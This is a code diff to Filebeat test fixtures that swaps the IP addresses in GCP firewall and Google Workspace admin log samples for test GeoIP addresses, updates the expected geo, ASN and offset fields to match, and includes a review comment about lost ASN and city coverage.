- "destination.ip": "8.8.8.8",
+ "destination.address": "175.16.199.1",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.port": 53,
 "event.action": "firewall-rule",
 "event.category": "network",
@@ -45,7 +46,7 @@
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
 "log.offset": 0,
- "network.community_id": "1:iiDdIEXnxwSiz/hJbVnseQ4SZVE=",
+ "network.community_id": "1:8MXNnjZEnMbNnkN/Bpg6mN0u+tw=",
 "network.direction": "outbound",
 "network.iana_number": 17,
 "network.name": "default",
@@ -53,7 +54,7 @@
 "network.type": "ipv4",
 "related.ip": [
 "10.128.0.16",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "rule.name": "network:default/firewall:adrian-test-1",
 "service.type": "gcp",
@@ -107,7 +108,7 @@
 ],
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 983,
+ "log.offset": 988,
 "network.community_id": "1:I+YM7Ru3rl0RVZt/y+F/hkoY0Zc=",
 "network.direction": "inbound",
 "network.iana_number": 6,
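Review bot: The new expected output for the 175.16.199.1 events in the hunk beginning `@@ -1,15 +1,16 @@` drops `destination.as.number` and `destination.as.organization.name`, so this fixture no longer exercises destination-side ASN enrichment at all; the same pattern repeats at `@@ -797,15 +798,16 @@` and `@@ -863,15 +865,16 @@`, and the google_workspace expected file's `@@ -32,23 +32,19 @@` hunk likewise loses `source.as.organization.name`, `source.geo.city_name`, `source.geo.region_iso_code` and `source.geo.region_name`. Presumably the new addresses were chosen because they resolve in the bundled test GeoIP database, but if the ASN and city/region mappings in the pipelines are meant to stay covered, at least one event should keep an address for which the test database returns that data, or the reduced coverage should be called out in the commit message.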
@@ -172,7 +173,7 @@
 ],
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 2025,
+ "log.offset": 2030,
 "network.community_id": "1:I0VuqgaYU1tgaECjlzIRuPzILlg=",
 "network.direction": "inbound",
 "network.iana_number": 6,
@@ -239,7 +240,7 @@
 ],
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 3074,
+ "log.offset": 3079,
 "network.community_id": "1:JXppP0Oqm+g33JYC0DKoWKxP1GI=",
 "network.direction": "inbound",
 "network.iana_number": 6,
@@ -304,7 +305,7 @@
 ],
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 4080,
+ "log.offset": 4085,
 "network.community_id": "1:JXppP0Oqm+g33JYC0DKoWKxP1GI=",
 "network.direction": "inbound",
 "network.iana_number": 6,
@@ -369,7 +370,7 @@
 ],
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 5086,
+ "log.offset": 5091,
 "network.community_id": "1:Us40G9GKff9nidizV7rCFgCQb9E=",
 "network.direction": "inbound",
 "network.iana_number": 6,
@@ -436,7 +437,7 @@
 ],
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 6141,
+ "log.offset": 6146,
 "network.community_id": "1:CKIvQ4W48ZjqiomnWxipDck9Yb0=",
 "network.direction": "inbound",
 "network.iana_number": 6,
@@ -503,7 +504,7 @@
 ],
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 7185,
+ "log.offset": 7190,
 "network.community_id": "1:4MspX9JxDXjbalHc/6y9GntbkUc=",
 "network.direction": "inbound",
 "network.iana_number": 6,
@@ -570,7 +571,7 @@
 ],
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 8228,
+ "log.offset": 8233,
 "network.community_id": "1:KygoHJBT+06I9CnmAPRmvl5CRO4=",
 "network.direction": "inbound",
 "network.iana_number": 6,
@@ -637,7 +638,7 @@
 ],
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 9279,
+ "log.offset": 9284,
 "network.community_id": "1:20yMRdGVeNrVtL6TKhpfMDy284w=",
 "network.direction": "inbound",
 "network.iana_number": 6,
@@ -704,7 +705,7 @@
 ],
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 10341,
+ "log.offset": 10346,
 "network.community_id": "1:20yMRdGVeNrVtL6TKhpfMDy284w=",
 "network.direction": "inbound",
 "network.iana_number": 6,
@@ -771,7 +772,7 @@
 ],
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 11403,
+ "log.offset": 11408,
 "network.community_id": "1:6fenc8+hp2KWF1J9vvGwv3iswV0=",
 "network.direction": "inbound",
 "network.iana_number": 6,
@@ -797,15 +798,16 @@
 },
 {
 "@timestamp": "2019-11-12T12:41:20.972Z",
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.address": "175.16.199.1",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.port": 80,
 "event.action": "firewall-rule",
 "event.category": "network",
@@ -840,8 +842,8 @@
 "gcp.source.vpc.vpc_name": "default",
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 12444,
- "network.community_id": "1:L+yxRTY3bxAv2hbljIrAstKlE+g=",
+ "log.offset": 12449,
+ "network.community_id": "1:hj1SFezPO/0oF174YfrjXhZGr4U=",
 "network.direction": "outbound",
 "network.iana_number": 6,
 "network.name": "default",
@@ -849,7 +851,7 @@
 "network.type": "ipv4",
 "related.ip": [
 "10.28.0.16",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "rule.name": "network:default/firewall:adrian-test-1",
 "service.type": "gcp",
@@ -863,15 +865,16 @@
 },
 {
 "@timestamp": "2019-11-12T12:42:26.505Z",
- "destination.address": "8.8.8.8",
- "destination.as.number": 15169,
- "destination.as.organization.name": "Google LLC",
- "destination.geo.continent_name": "North America",
- "destination.geo.country_iso_code": "US",
- "destination.geo.country_name": "United States",
- "destination.geo.location.lat": 37.751,
- "destination.geo.location.lon": -97.822,
- "destination.ip": "8.8.8.8",
+ "destination.address": "175.16.199.1",
+ "destination.geo.city_name": "Changchun",
+ "destination.geo.continent_name": "Asia",
+ "destination.geo.country_iso_code": "CN",
+ "destination.geo.country_name": "China",
+ "destination.geo.location.lat": 43.88,
+ "destination.geo.location.lon": 125.3228,
+ "destination.geo.region_iso_code": "CN-22",
+ "destination.geo.region_name": "Jilin Sheng",
+ "destination.ip": "175.16.199.1",
 "destination.port": 80,
 "event.action": "firewall-rule",
 "event.category": "network",
@@ -906,8 +909,8 @@
 "gcp.source.vpc.vpc_name": "default",
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 13425,
- "network.community_id": "1:c7bqGkBTPmOmWydHv/uxpk1qOjc=",
+ "log.offset": 13435,
+ "network.community_id": "1:CtPZG1inscOsdz/61j5WLHMljVI=",
 "network.direction": "outbound",
 "network.iana_number": 17,
 "network.name": "default",
@@ -915,7 +918,7 @@
 "network.type": "ipv4",
 "related.ip": [
 "10.28.0.16",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "rule.name": "network:default/firewall:adrian-test-1",
 "service.type": "gcp",
@@ -975,7 +978,7 @@
 "gcp.source.vpc.vpc_name": "default",
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 14407,
+ "log.offset": 14422,
 "network.community_id": "1:DAX43chSGct8LhjTchX9JgmQSEE=",
 "network.direction": "internal",
 "network.iana_number": 6,
@@ -1046,7 +1049,7 @@
 "gcp.source.vpc.vpc_name": "default",
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 15594,
+ "log.offset": 15609,
 "network.community_id": "1:TPU3xS0q892TRpPVImmLO31ok9s=",
 "network.direction": "internal",
 "network.iana_number": 6,
@@ -1111,7 +1114,7 @@
 ],
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 16781,
+ "log.offset": 16796,
 "network.community_id": "1:nptqbsyCEhZhJ1ZBfy4iEMDFucI=",
 "network.direction": "inbound",
 "network.iana_number": 6,
@@ -1183,7 +1186,7 @@
 "gcp.source.vpc.vpc_name": "default",
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 17858,
+ "log.offset": 17873,
 "network.community_id": "1:+KvUpcdGASPCZ5QYcOHVgid9Yjg=",
 "network.direction": "internal",
 "network.iana_number": 6,
@@ -1254,7 +1257,7 @@
 "gcp.source.vpc.vpc_name": "default",
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 19045,
+ "log.offset": 19060,
 "network.community_id": "1:v6u3NIKBcvTUebkWUOly9nrN/HE=",
 "network.direction": "internal",
 "network.iana_number": 6,
@@ -1326,7 +1329,7 @@
 "gcp.source.vpc.vpc_name": "default",
 "input.type": "log",
 "log.logger": "projects/test-beats/logs/compute.googleapis.com%2Ffirewall",
- "log.offset": 20231,
+ "log.offset": 20246,
 "network.community_id": "1:6Q1oPyCPH/prdYU6FXBpxAgFrP8=",
 "network.direction": "internal",
 "network.iana_number": 6,
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log
index 2d2d36e96a30..fa9088086f86 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log
@@ -1,9 +1,9 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"CHANGE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"REORDER_GROUP_BASED_POLICIES_EVENT","parameters":[{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_PRIORITIES","multiValue":["a","b"]},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"GPLUS_PREMIUM_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"UPDATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED","parameters":[{"name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION","value":"FLASHLIGHT_EDU_SELECTION_MANUAL"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"CHANGE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"REORDER_GROUP_BASED_POLICIES_EVENT","parameters":[{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_PRIORITIES","multiValue":["a","b"]},{"name":"SETTING_NAME","value":"setting"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"GPLUS_PREMIUM_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"UPDATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED","parameters":[{"name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION","value":"FLASHLIGHT_EDU_SELECTION_MANUAL"}]}} diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json index a6a661e76c10..9553952fe797 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-application-test.json.log-expected.json 
@@ -9,7 +9,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CHANGE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CHANGE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change"
@@ -32,23 +32,19 @@
 "log.offset": 0,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -70,7 +66,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "creation"
@@ -89,26 +85,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 641,
+ "log.offset": 640,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -130,7 +122,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "deletion"
@@ -149,26 +141,22 @@
 "group.domain": "example.com",
 "group.name": "group",
 "input.type": "log",
- "log.offset": 1247,
+ "log.offset": 1245,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
